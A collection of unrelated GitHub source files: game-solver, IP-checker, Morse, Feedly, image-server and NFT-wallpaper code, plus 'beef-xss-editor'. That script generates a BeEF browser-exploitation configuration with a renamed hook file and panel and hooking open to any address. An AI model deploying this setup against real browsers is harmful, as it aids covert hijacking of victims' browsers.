file=log, end='\n\n')
log.close()
raise
```
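A hedged example session with the router above; the five-tank color strings are arbitrary:
```
$ python chemrouter.py
Chemsynth Router [Version 2.0] by whoami and mrx
type -h or --help for more informations

>>> -r RYGBP PBGYR -a
>>> -q
```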
#### File: growtopia-chemsynth-router/chemsynth/chemsynth.py
```python
from random import randint
from helper.helper_func import find
__all__ = ['Chemsynth',
'ChemsynthException'
]
# ======
# Colors
# ======
RED = 0
YELLOW = 1
GREEN = 2
BLUE = 3
PINK = 4
# ===================
# Chemsynth Exception
# ===================
class ChemsynthException(Exception): pass
class UnspecifiedColor(ChemsynthException): pass
class UnidentifiedColor(ChemsynthException): pass
# =============================
# Utility functions and classes
# =============================
class Chemsynth:
'''
This class provides all the tools Chemsynth needs
'''
# ============
# Class Member
# ============
    __slots__ = ('_dom',)   # one-element tuples need the trailing comma
    _virtual = ('dom',)     # as a bare string, "name in self._virtual" would do substring matching
# list of expected input color string
color_table = ('R', 'Y', 'G', 'B', 'P')
# ========================
# Class Building Functions
# ========================
def __init__(self, dom):
# validating input color
self.__color_validation(dom)
# initialization
self._dom = list(dom.upper().strip())
# encode color
self._encode_color(self._dom)
def __eq__(self, other):
return self._dom == other._dom
def __len__(self):
return len(self._dom)
def __repr__(self):
return repr(self._dom)
def __str__(self):
temp = self._dom.copy()
self._decode_color(temp)
return "[" + "|".join(temp) + "]"
def __getattr__(self, name):
'''
fetching a virtual attribute, virtual attribute is used
when fecthing an attribute in _virtual to make a new
instance
'''
if name in self._virtual:
temp = object.__getattribute__(self, '_' + name).copy()
self._decode_color(temp)
return ''.join(temp)
raise AttributeError("%s object has no attribute %s" %(self.__class__.__name__, name))
@staticmethod
def _encode_color(dom):
'''
encode color to index based on Chemsynth.color_table
'R' -> RED
'Y' -> YELLOW
'G' -> GREEN
'B' -> BLUE
'P' -> PINK
'''
for index in range(len(dom)):
dom[index] = find(Chemsynth.color_table, dom[index])
@staticmethod
def _decode_color(dom):
'''
decode index to color based on Chemsynth.color_table
RED -> 'R'
YELLOW -> 'Y'
GREEN -> 'G'
BLUE -> 'B'
PINK -> 'P'
'''
for index in range(len(dom)):
dom[index] = Chemsynth.color_table[dom[index]]
# ================
# Interface Helper
# ================
@staticmethod
def __color_validation(color_string):
'''
validating input color based on Chemsynth.color_table
'''
# prepare
temp = color_string.upper().strip()
# test for empty color
if temp == "":
raise UnspecifiedColor("color not specified")
# test for unidentified color
for index in range(len(temp)):
if not(temp[index] in Chemsynth.color_table):
raise UnidentifiedColor("unidentified color: '%s'" % (color_string[index]))
@staticmethod
def __centrifuge_far(length, index):
'''
produce a maximum block distance that can be affected by a centrifuge
'''
mid = length >> 1 # length // 2
max_value = (mid) - ((length & 1)^1) # length % 2 == length & 1
# calculating
# upper than mid
if index > mid:
return max_value - index + mid
# mid
elif index == mid:
return max_value
# lower than mid
return index
@staticmethod
def __catalyst_range(tank, index):
'''
produce a maximum block range that can be affected by a catalyst
'''
start, end = index, index
# calculating start index
while start-1 > -1 and tank[start-1] == tank[index]:
start -= 1
# calculating end index
while end+1 < len(tank) and tank[end+1] == tank[index]:
end += 1
return (start, end+1)
# =========
# Interface
# =========
def solvent(self, index):
'''
Use on a highlighted Chemsynth Tank to dissolve it,
shifting chemicals left to fill in the gap. A random
chemical is added in the rightmost tank.
'''
# shifting block to the left
for i in range(1, len(self._dom)):
self._dom[i-1] = self._dom[i]
# random color in rightmost tank
self._dom[len(self._dom)-1] = randint(RED, PINK)
def replicator(self, index):
'''
Use on a highlighted Chemsynth Tank to duplicate its
content, pushing all chemicals to the right to make
room.
'''
# shifting block to the right start at index till len-1 but doing from right
for i in range(len(self._dom)-1, index, -1):
self._dom[i] = self._dom[i-1]
def catalyst(self, index):
'''
Use on a highlighted Chemsynth Tank to shift its color
upward on the spectrum (Red, Yellow, Green, Blue,
Pink, Red). This also affects all touching tanks of the
same color.
'''
# get range start from x, end at y (excluding y)
start, after_end = self.__catalyst_range(self._dom, index)
# change color to the next color
self._dom[index] = (self._dom[index] + 1) % len(Chemsynth.color_table)
# side effect of catalyst, affect all the same color before color changed
for i in range(start, after_end):
self._dom[i] = self._dom[index]
def stirrer(self, index):
'''
Use on a highlighted Chemsynth Tank to swap the
chemicals on either side of it with each other. The
selected tank is unaffected.
'''
# out of range mitigation
if not(index == 0 or index == len(self._dom)-1):
# swap color
self._dom[index-1], self._dom[index+1] = self._dom[index+1], self._dom[index-1]
def centrifuge(self, index):
'''
Use on a highlighted Chemsynth Tank to rotate
chemicals around it. Rotates as many from the right
as it can to match how many are to the left of the
selected tank.
'''
# get the maximum distance that can be reached by centrifuge
range_plus_or_minus = self.__centrifuge_far(len(self._dom), index)
# swap color
for x in range(1, range_plus_or_minus+1):
self._dom[index-x], self._dom[index+x] = self._dom[index+x], self._dom[index-x]
```
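A short hedged sketch of the tank API defined above; the color string is arbitrary:
```python
from chemsynth.chemsynth import Chemsynth

tank = Chemsynth("RYGBP")
print(tank)        # [R|Y|G|B|P]
tank.catalyst(0)   # shift R -> Y (and any touching tanks of the same color)
tank.stirrer(2)    # swap the tanks on either side of index 2
print(tank.dom)    # decoded color string via the virtual attribute
```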
#### File: growtopia-chemsynth-router/route/point_based.py
```python
from chemsynth.chempoint import ChemsynthPoint
from helper.helper_func import find
# relative import
from .execute import execute
from .execute import CENTRIFUGE, STIRRER, CATALYST, REPLICATOR
__all__ = ['point_route']
# ascending order based on value CENTRIFUGE, STIRRER, CATALYST, REPLICATOR
_func_point = (ChemsynthPoint.centrifuge_point, ChemsynthPoint.stirrer_point, ChemsynthPoint.catalyst_point,
ChemsynthPoint.replicator_point)
def _bruteforce(chem, func):
'''
return list of point from func
'''
# prepare
temp = [0]*len(chem._dom)
# get list of point from bruteforcing with func on each item
for index in range(len(chem._dom)):
temp[index] = func(chem, index)
# return list of point
return temp
def _best_route(chem):
'''
get the best route from list of list of point from function in ChemsynthPoint
'''
# there are four function, each of them will be bruteforced to get list of point
ways = [[],[],[],[]]
max_value = 0
max_index = 0
func_index = 0
# start to get list of point
for i in (CENTRIFUGE, STIRRER, CATALYST, REPLICATOR):
# get list of point from _func_point[i]
ways[i] = _bruteforce(chem, _func_point[i])
# calculating the best route
if max(ways[i]) > max_value:
max_value = max(ways[i])
max_index = find(ways[i],max(ways[i]))
func_index = i
# return function-index, index of item, and it's point
return (func_index, max_index, max_value)
def point_route(chem):
'''
return to_do_list which is list of function's index and item's index.
WARNING chem modified
'''
# prepare
to_do_list = []
# while domain color != target color
while chem._dom != chem._tar:
# getting function's index, item's index, and it's point
func_index, index, point = _best_route(chem)
# point <= 0 means, bad if we continuing to do it, so just break
if point <= 0:
break
# execute chem with specified function's index and item's index
execute(chem, [[func_index, index]])
# append step to to_do_list
to_do_list.append((func_index, index))
# return to_do_list
return to_do_list
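# Hedged usage sketch: point_route expects a ChemsynthPoint-like object that
# carries both _dom and _tar (see chempoint.py); Chemsynth alone has no _tar.
# The constructor shape below is hypothetical:
#   chem = ChemsynthPoint("RYGBP", "PBGYR")
#   steps = point_route(chem)   # [(func_index, item_index), ...]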
``` |
{
"source": "0xWTC/check-your-ip-address-and-location",
"score": 3
} |
#### File: 0xWTC/check-your-ip-address-and-location/check.py
```python
import logging
import requests
import json
import time
from multiprocessing import Pool
def pool_worker(id):
Checker(id).main()
def ip_pooler(checks, threads):
ids = []
for _ in range(checks): # number of checks to run
ids.append(_)
p = Pool(threads) # number of simultaneous checks
p.map(pool_worker, ids)
class Checker:
"""Check your IP addresses and other parameters on https://wtfismyip.com"""
def __init__(self, name):
self.name = name
self.logging_init()
def logging_init(self):
"""Start the logging library at level = DEBUG. You can switch to level = ERROR when you're finished with development."""
logging.basicConfig(filename = "./logging.log", level = logging.DEBUG)
self.logger = logging.getLogger()
    def time_start(self):
        # store the timestamp under a separate name so the float doesn't shadow this method
        self.start_time = time.time()
    def time_end(self):
        time_stop = time.time()
        self.dt = time_stop - self.start_time
        return round(self.dt, 2)
def check_ip(self):
try:
request_data = requests.get('http://wtfismyip.com/json')
except Exception as e:
self.logger.error(e)
raise
json_data = json.loads(request_data.text)
ip = json_data['YourFuckingIPAddress']
hostname = json_data['YourFuckingHostname']
location = json_data['YourFuckingLocation']
isp = json_data['YourFuckingISP']
return (
f"Checker id: {self.name}\n"
f"IP: {ip}\n"
f"Hostname: {hostname}\n"
f"Location: {location}\n"
f"ISP: {isp}"
)
def main(self):
self.time_start()
print(self.check_ip())
        time_end = self.time_end()  # no braces: a set literal would print as {12.34}
print(f"It took {time_end} seconds to look up this data.\n")
self.logger.info(f"Process: {self.name}. {time_end} seconds runtime.")
if __name__ == "__main__":
"""This will run if this script is executed directly and NOT imported into another script"""
print("Welcome to the IP checker!\n")
Checker(666).main()
#ip_pooler(checks=10, threads=2) # uncomment this to try multithreading
``` |
{
"source": "0xYa5h/Python-Thunder",
"score": 3
} |
#### File: 0xYa5h/Python-Thunder/forEncodeMorse.py
```python
mcode = { 'A':'.-', 'B':'-...',
'C':'-.-.', 'D':'-..', 'E':'.',
'F':'..-.', 'G':'--.', 'H':'....',
'I':'..', 'J':'.---', 'K':'-.-',
'L':'.-..', 'M':'--', 'N':'-.',
'O':'---', 'P':'.--.', 'Q':'--.-',
'R':'.-.', 'S':'...', 'T':'-',
'U':'..-', 'V':'...-', 'W':'.--',
'X':'-..-', 'Y':'-.--', 'Z':'--..',
'1':'.----', '2':'..---', '3':'...--',
'4':'....-', '5':'.....', '6':'-....',
'7':'--...', '8':'---..', '9':'----.',
'0':'-----', ', ':'--..--', '.':'.-.-.-',
'?':'..--..', '/':'-..-.', '-':'-....-',
'(':'-.--.', ')':'-.--.-'}
def encrypt(message):
cipher = ''
for letter in message:
if letter != ' ':
cipher += mcode[letter] + ' '
else:
cipher += ' '
return cipher
def decrypt(message):
message += ' '
decipher = ''
citext = ''
for letter in message:
if (letter != ' '):
i = 0
citext += letter
else:
i += 1
if i == 2 :
decipher += ' '
else:
decipher += list(mcode.keys())[list(mcode.values()).index(citext)]
citext = ''
return decipher
def process():
n = int(input("enter 1 for encryption 0 for decryption "))
if n == 1:
        enc_message = input("Enter a message to encrypt ")
result = encrypt(enc_message.upper())
print (result)
else:
        dec_message = input("Enter encrypted message to decrypt ")
result = decrypt(dec_message)
print (result)
process()
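# Hedged example: encrypt("SOS") -> "... --- ... " and decrypt("... --- ...")
# -> "SOS"; letters are separated by one space, words by two.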
``` |
{
"source": "0xYasser/rssOptimizer",
"score": 3
} |
#### File: rssOptimizer/src/feedly_helper.py
```python
import config
import requests
import json
import jellyfish
import re
FEEDLY_URI = "http://cloud.feedly.com"
def get_subscriptions():
    # return the user's subscriptions
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
uri = '/v3/subscriptions'
url = FEEDLY_URI + uri
subscriptions = requests.get(url=url, headers=headers).json()
return subscriptions
def get_unread_entries_in_category(ids):
# id: category id
# return unred items for a given category
unread = []
MAX_ENTRIES = 10000 # max number of entry ids to return based on feedly doc
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
for i in range(len(ids)):
uri = '/v3/streams/ids?streamId='+ids[i]+'&count='+str(MAX_ENTRIES)+'&unreadOnly=true'
url = FEEDLY_URI + uri
unread.append(requests.get(url=url, headers=headers).json())
return unread
def get_categories():
    # return a list of the ids of the user's categories
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
uri = '/v3/categories'
url = FEEDLY_URI + uri
categories = requests.get(url=url, headers=headers).json()
data = []
for i in range(len(categories)):
if(categories[i]['label'] != 'Must Read'):
data.append(categories[i]['id'])
return data
def delete_category(id):
# id: category id
# delete the given category id from feedly
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
uri = '/v3/categories/' + id
url = FEEDLY_URI + uri
response = requests.delete(url=url, headers=headers).json()
return response
def get_entry_contents(id):
    # id: list of entry ids
    # return the full content objects for the given entries
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret}
uri = '/v3/entries/.mget'
url = FEEDLY_URI + uri
contents = requests.post(url=url, headers=headers, json=id).json()
return contents
def clean_content(data):
    # data: list of raw entry contents
    # return a list of [id, title, url] entries
clean_data = []
for i in range(len(data)):
single = [""] * 3
single[0] = data[i]['id']
single[1] = data[i]['title']
single[2] = data[i]['alternate'][0]['href']
clean_data.append(single)
return clean_data
def check_similarity(data1, data2):
    # data1, data2: two [id, title, url] lists
    # return True when the Jaro-Winkler title score exceeds 85 or the urls match
title_score = jellyfish.jaro_winkler(data1[1].lower(),data2[1].lower()) * 100
#if title_score > 80:
# print('\n',data1[1].lower(),'--' ,data2[1].lower(),':',title_score)
rx = re.compile(r'[^(http:/|https:/)].*$')
t1 = rx.findall(data1[2].lower())[0]
t2 = rx.findall(data2[2].lower())[0]
url_score = (t1 == t2)
if( url_score or title_score > 85):
return True
return False
def get_duplicates_content(data):
    # data: list of [id, title, url] entries
    # return a list of ids of the duplicate entries
similar = False
dub_id = []
added = []
for i in range(len(data)):
for j in range(len(data)):
if(i != j):
similar = check_similarity(data[i],data[j])
if (similar and data[j][0] not in dub_id and data[i][0] not in dub_id):
#print(data[j][1],"\n ",data[i][1],"\n ",data[j][2],"\n ",data[i][2])
dub_id.append(data[j][0])
return dub_id
def mark_read(body_data):
    # body_data: list of entry ids to mark read
    # return a status string describing the request result
count = len(body_data)
client_secret = config.FEEDLY_CONFIG['CLIENT_SECRET']
headers = {'Authorization': 'Bearer '+client_secret, 'Content-type': 'application/json'}
uri = '/v3/markers'
url = FEEDLY_URI + uri
body = create_read_body(body_data)
contents = requests.post(url=url, headers=headers, data=json.dumps(body))
result = "The request returned \"{}\", and {} marked read".format(contents.reason, count)
return result
def create_read_body(data):
# data: list of ids to mark read
    # return a dict shaped like the body the feedly markers endpoint expects
body = {}
body['action'] = 'markAsRead'
body['type'] = 'entries'
body['entryIds'] = data
return body
def work():
category = get_categories()
unread = get_unread_entries_in_category(category)
contents = get_entry_contents(unread)
clean = clean_content(contents)
dubs = get_duplicates_content(clean)
mark = mark_read(dubs)
print(mark)
work()
```
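A quick hedged check of the similarity rule implemented above (scheme-insensitive URL match, or a Jaro-Winkler title score above 85), reusing `check_similarity` from this module; the entries are made up:
```python
a = ['id1', 'Python 3.12 Released', 'https://example.com/python-312']
b = ['id2', 'python 3.12 released', 'http://example.com/python-312']
print(check_similarity(a, b))  # True: identical titles and a scheme-insensitive URL match
```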
#### File: rssOptimizer/src/rssOptimizer.py
```python
import config
import opml
import feedparser
def opml_url_parser():
# return a dictionary (title,url)
opmlFile = config.RSSOPT_CONFIG['OPML_LOCATION']
feeds = dict()
rss = opml.parse(opmlFile)
for i in range(0,len(rss)):
for j in range(0,len(rss[i])):
feeds[rss[i][j].title] = rss[i][j].xmlUrl
return feeds
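# Hedged usage sketch (OPML_LOCATION in config.py must point at an OPML export):
#   for title, url in opml_url_parser().items():
#       print(title, url)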
``` |
{
"source": "0xyg3n/beef-xss-editor",
"score": 2
} |
#### File: 0xyg3n/beef-xss-editor/beef-xss-editor.py
```python
import os
import getpass
import time
import shutil
#Coded by 0xyg3n
#Trying to make your life easier with this.
def banner():
os.system('clear')
print """
___ ____ ____ ____ _ _ ____ ____ ____ ___ _ ___ ____ ____
|__] |___ |___ |___ __ \/ [__ [__ __ |___ | \ | | | | |__/
|__] |___ |___ | _/\_ ___] ___] |___ |__/ | | |__| | \ ver 1.0
Coded By 0xyg3n
"""
def config():
banner()
ipathbeef=raw_input(' Please Specify Beef-Xss Path (Default /usr/share/beef-xss/): ')
print ''
fhost=raw_input(" [i]Host: ")
print ''
fport=raw_input(" [i]Port: ")
print ''
hookname=raw_input(" [i]Hook.js Rename: ")
print ''
ui=raw_input(" [i]Panel: ")
print ''
buser=raw_input(" [i]Beef Username: ")
print ''
bpasswd=getpass.getpass(" [i]Beef Password: ")
os.system('clear')
banner()
print '''
+==============================================+
[i]Host: '''+fhost+'''\n
[i]Port: '''+fport+'''\n
[i]HookJS: '''+hookname+'''\n
[i]Panel: '''+ui+'''\n
[i]Beef Username: '''+buser+'''\n
[i]Beef PassWord: ******
+==============================================+
'''
time.sleep(4)
data='''
#
# Copyright (c) 2006-2016 <NAME> - <EMAIL>
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.4.7.0-alpha'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "'''+fhost+'''"
port: "'''+fport+'''"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT
# set the public hostname and port here
#public: "" # public hostname/IP address
#public_port: "" # experimental
# DNS
dns_host: "localhost"
dns_port: 53
# Web Admin user interface URI
web_ui_basepath: "/'''+ui+'''"
# Hook
hook_file: "/'''+hookname+'''.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
# For information on using other databases please read the
# README.databases file
# supported DBs: sqlite, mysql, postgres
# NOTE: you must change the Gemfile adding a gem require line like:
# gem "dm-postgres-adapter"
# or
# gem "dm-mysql-adapter"
# if you want to switch drivers from sqlite to postgres (or mysql).
# Finally, run a 'bundle install' command and start BeEF.
driver: "sqlite"
# db_file is only used for sqlite
db_file: "beef.db"
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 3306
db_name: "beef"
db_user: "beef"
db_passwd: "<PASSWORD>"
db_encoding: "UTF-8"
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin_UI extension
credentials:
user: "'''+buser+'''"
passwd: "'''+<PASSWORD>+'''"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
        # If the module doesn't return status/results and the timeout is exceeded, continue with the chain anyway.
        # This is useful for calling modules (nested-forward chain mode) that do not return their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database:
# curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
# gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
enable: false
database: '/opt/GeoIP/GeoLiteCity.dat'
# Integration with PhishingFrenzy
    # If enabled, BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify victims. This makes it easy to associate phishing emails with hooked browsers.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
extension:
requester:
enable: true
proxy:
enable: true
key: "beef_key.pem"
cert: "beef_cert.pem"
metasploit:
enable: false
social_engineering:
enable: true
evasion:
enable: false
ipec:
enable: true
# this is still experimental..
dns:
enable: false
# this is still experimental..
dns_rebinding:
enable: false
'''
    print ''
    print '[*]Writing Out Current Settings Into config.yaml..\n'
    conf = open('config.yaml', 'w')
    conf.write(data)
    conf.close()
    time.sleep(3)
    print '[*]Moving To Beef Directory..\n'
    wfilew = 'config.yaml'
    os.system("mv " + wfilew + " " + ipathbeef)
    time.sleep(3)
    print '[*]Done.\n'
    exit()
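
# Hedged sketch (not part of the original script): re-read the generated file to
# confirm it is valid YAML before moving it into place. Assumes PyYAML is installed.
def verify_config(path='config.yaml'):
    import yaml
    with open(path) as f:
        yaml.safe_load(f)  # raises yaml.YAMLError if the generated output is malformed
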
config()
``` |
{
"source": "0xYG3NIUM/testapp",
"score": 2
} |
#### File: 0xYG3NIUM/testapp/server.py
```python
from os import listdir
from os.path import isfile, join
import traceback
import json
import uuid
import re
import tempfile
from flask import Flask, request
import wand.image
import wand.display
import wand.exceptions
app = Flask(__name__)
#local stuff
from img import persisted_img
im = persisted_img()
BANK_PATH = "static\\img\\bank"
BANK_THUMB_PATH = join(BANK_PATH,'thumb')
print ('USING BANK PATH ' + BANK_PATH)
print ('USING THUMB PATH ' + BANK_THUMB_PATH)
def get_images(path):
    # this isn't very robust, oh well
    return filter(
        lambda x: re.search(r'\.(jpg|jpeg|png)', x.lower()) is not None,
        [join(path, f) for f in listdir(path) if isfile(join(path, f))]
    )
def get_bank_images():
return get_images(BANK_PATH)
def get_thumb_images():
return get_images(BANK_THUMB_PATH)
@app.route("/")
def index():
return '''
<html>
<head>
</head>
<body>
<div id="content"></div>
<script type="text/javascript" src="/static/js/all.js"></script>
</body>
</html>
'''
@app.route('/similar', methods=['POST'])
def similar():
if request.method == 'POST':
file = request.files['file']
if file:
tmpfile = join(
tempfile.gettempdir(),
file.name
)
file.save(tmpfile)
#lol shitty
try:
with wand.image.Image(filename=tmpfile) as img:
img.resize(256, 256)
img.save(filename=tmpfile)
matches = im.match(tmpfile, limit=10)
return json.dumps(matches)
except:
traceback.print_exc()
pass
return '', 400
@app.route('/bank', methods=['GET', 'POST'])
def bank():
if request.method == 'POST':
file = request.files['file']
print (file)
if file:
tmpfile = join(
tempfile.gettempdir(),
file.name
)
guid = str(uuid.uuid4().hex.upper()[0:12]) + '.jpg'
dstfile = join(
BANK_PATH,
guid
)
dstfile_thumb = join(
BANK_THUMB_PATH,
guid
)
file.save(tmpfile)
try:
with wand.image.Image(filename=tmpfile) as img:
img.save(filename=dstfile)
#will potentially produce some funny results with extremely wide/oblong images
img.resize(256, 256)
img.save(filename=dstfile_thumb)
im.add_image(dstfile_thumb)
except wand.exceptions.MissingDelegateError:
return 'input is not a valid image', 500
return '', 200
elif request.method == 'GET':
limit = 10
try:
limit = int(request.args.get('limit', '10'))
except ValueError:
pass
#note, will spit back any non dir
files = list(get_bank_images())
return json.dumps({
'count' : im.get_count(),
'latest' : ['/'+f for f in files[0:limit]]
})
return '', 400
if __name__ == "__main__":
#todo: toggle debug from config
app.debug = True
app.run()
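    # Hedged usage sketch (assumes the `requests` package; not part of the app):
    #   import requests
    #   with open('query.jpg', 'rb') as fh:
    #       r = requests.post('http://127.0.0.1:5000/similar', files={'file': fh})
    #   print(r.json())  # up to ten closest matches from the image bank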
``` |
{
"source": "0xYoan/python_cherrytree",
"score": 3
} |
#### File: python_cherrytree/tests/test_python_cherrytree.py
```python
import unittest
from python_cherrytree import python_cherrytree
class TestPython_cherrytree(unittest.TestCase):
"""Tests for `python_cherrytree` package."""
def setUp(self):
"""Set up test fixtures, if any."""
self.manager = python_cherrytree.SqlManager("./tests/CTF_template.ctb")
def tearDown(self):
"""Tear down test fixtures, if any."""
def test_show_nodes(self):
"""Test show_nodes."""
self.manager.show_nodes()
def test_change_node_name(self):
"""Test change_node_name"""
self.manager.change_node_name("Test", 22)
def test_add_txt(self):
"""Test add_txt"""
self.manager.add_txt("Text", 24)
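
# Hedged usage note (not part of the original tests): these fixtures assume
# tests/CTF_template.ctb exists; from the package root the suite can be run with
#   python -m unittest tests.test_python_cherrytree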
``` |
{
"source": "0xzche/0xplanet",
"score": 2
} |
#### File: libnft/url/asset.py
```python
from ..utils import log
import json
import pathlib
import pandas as pd
from flask import current_app
from .request import get_with_retry
slug_info = {
"azuki": {
"opensean_url": "https://opensea.io/assets/0xed5af388653567af2f388e6224dc7c4b3241c544/{idx}",
"token_uri": "https://<KEY>
},
"0xzuki": {
"token_uri": "https://metadata.0xzuki.com/{idx}",
"opensea_url": "https://opensea.io/assets/0x2eb6be120ef111553f768fcd509b6368e82d1661/",
},
"felinefiendznft": {
"token_uri": "https://fiendz.io/metadata/{idx}.json",
"img_url_file": "meta/img_url//felinefiendznft.csv",
},
"loser-club-official": {
"token_uri": "https://api.loserclub.io/ipfs/QmVKHeqzbTVKzp88prnXwz3MdDMyMMEDjpGzL5aARriUbD/{idx}.json"
},
}
class Asset:
def __init__(self, *, slug, idx):
self._slug = slug
self._idx = idx
self._token_uri = self.get_token_uri()
self._token_uri_json = self.get_token_uri_json()
log.info(f"Initialized: collection {slug} number {idx}")
@property
def is_supported(self):
return self._slug in slug_info
def get_token_uri(self):
if not self.is_supported:
raise NotImplementedError(f"{self._slug} is not supported right now. Supported collections: {list(slug_info.keys())}")
base_uri = slug_info[self._slug]["token_uri"]
return base_uri.format(idx = self._idx)
def get_token_uri_json(self):
resp = get_with_retry(self._token_uri)
asset_info = json.loads(resp.text)
return asset_info
@property
def img_url(self):
img_url = self._token_uri_json["image"]
log.info(f"image: {img_url}")
if slug_info[self._slug].get("img_url_file", None): # first check if we have downloaded the img_url to file
img_url_file = slug_info[self._slug].get("img_url_file", None)
log.info(f"reading img_url from file {img_url_file}")
img_url_df = pd.read_csv(f"{current_app.root_path}/static/{img_url_file}").rename(
columns={"num": "idx"}).set_index("idx")
img_url = img_url_df.loc[int(self._idx)]["img_url"]
log.info(f"img_url from file: {img_url}")
elif img_url.startswith("ipfs"): # this does not work
hash_ = img_url.split("/")[-1]
log.info(f"extracted hash {hash_}")
if not hash_ or not hash_.startswith('Qm'):
raise ValueError(f"invalid hash {hash_}")
img_url = "http://127.0.0.1:8080/ipfs/" + hash_
log.info(f"url from ipfs hash: {img_url}")
return img_url
def get_img(self, out_file=None):
resp = get_with_retry(self.img_url)
if out_file is not None:
pathlib.Path(out_file).parent.mkdir(parents=True, exist_ok=True)
log.info(f"downloading {self.img_url} to {out_file}")
log.info(f"writing image to {out_file}")
with open(str(out_file), "wb") as f:
f.write(resp.content)
self._img = resp.content
return self._img
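
# Hedged usage sketch (requires network access and a supported slug):
#   asset = Asset(slug="azuki", idx="1")
#   asset.get_img(out_file="azuki_1.png")  # fetches token metadata, then the image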
```
#### File: 0xzche/0xplanet/main.py
```python
from flask import Flask, render_template, request, send_file, current_app, url_for, redirect
import numpy as np
from PIL import Image, ImageFilter, ImageDraw, ImageFont
from io import BytesIO
import sys, os
sys.path.insert(0, "../..")
from libnft.url.asset import Asset
from libnft.utils import *
from apps import wallpaper
from apps.kiri_likes import kiri_likes
from base64 import b64encode
#from libnft.test import data_path
#CLOUD_STORAGE_BUCKET = os.environ['CLOUD_STORAGE_BUCKET']
app = Flask(__name__)
cache = {
}
name_to_slug = {
"Azuki": "azuki",
"0xZuki": "0xzuki",
"<NAME>": "felinefiendznft",
"Loser Club": "loser-club-official"
}
@app.route("/wallpaper", methods=["POST", "GET"])
def wallpaper_index():
if request.method == 'POST':
log.info(f"{request.form}")
slug = name_to_slug.get(request.form["slug_name"])
idx = request.form["idx"]
if not idx:
return render_template("wallpaper_index.html", warning="Please input a valid number (0~9999) !!")
size = request.form["size"]
h, w = size.split("(")[0].split(":")
ratio = f"{h}by{w}"
max_idx = wallpaper.get_info(slug)["idx_range"][-1]
idx = str(min(max_idx, int(idx)))
log.info(f"{slug}, {idx}, {ratio}")
return redirect(url_for(f'wallpaper_out', slug=slug, idx=idx, ratio=ratio))
return render_template("wallpaper_index.html")
@app.route("/wallpaper/<slug>/<idx>/<ratio>/img")
def wallpaper_img(slug, idx, ratio):
h, w = ratio.split("by")
ratio = float(h) / float(w)
cache_key = (slug, idx, ratio)
log.info(f"cached items: {cache.keys()}, cache id: {id(cache)}")
if cache_key in cache:
log.info(f"retreiving image {cache_key} from cache....")
new_img = cache[(slug, idx, ratio)]
else:
log.info(f"image {cache_key} not found in cache, creating new ....")
if len(cache) > 50:
log.info(f"cache too large btw, clearing...")
cache.clear()
asset = Asset(slug=slug, idx=idx)
collection_info = wallpaper.get_info(slug)
old_img_bytes = asset.get_img()
old_img = Image.open(BytesIO(old_img_bytes))
if old_img.size[0] > 1000:
old_img = old_img.resize((1000, 1000))
log.info(f"processing image")
old_w, old_h = old_img.size
new_w = old_w
new_h = int(new_w * ratio)
bg_color = old_img.getpixel((10, 10))
new_img = Image.new("RGBA", size=(new_w, new_h), color=bg_color)
n_slices = collection_info.get("n_slices")
if n_slices:
top_slice = old_img.crop((0, 0, old_w, old_h // n_slices))
for i in range(int(n_slices * 1.3)):
new_img.paste(top_slice, (0, i * old_h // n_slices))
paste_anchor = (0, new_h - old_h)
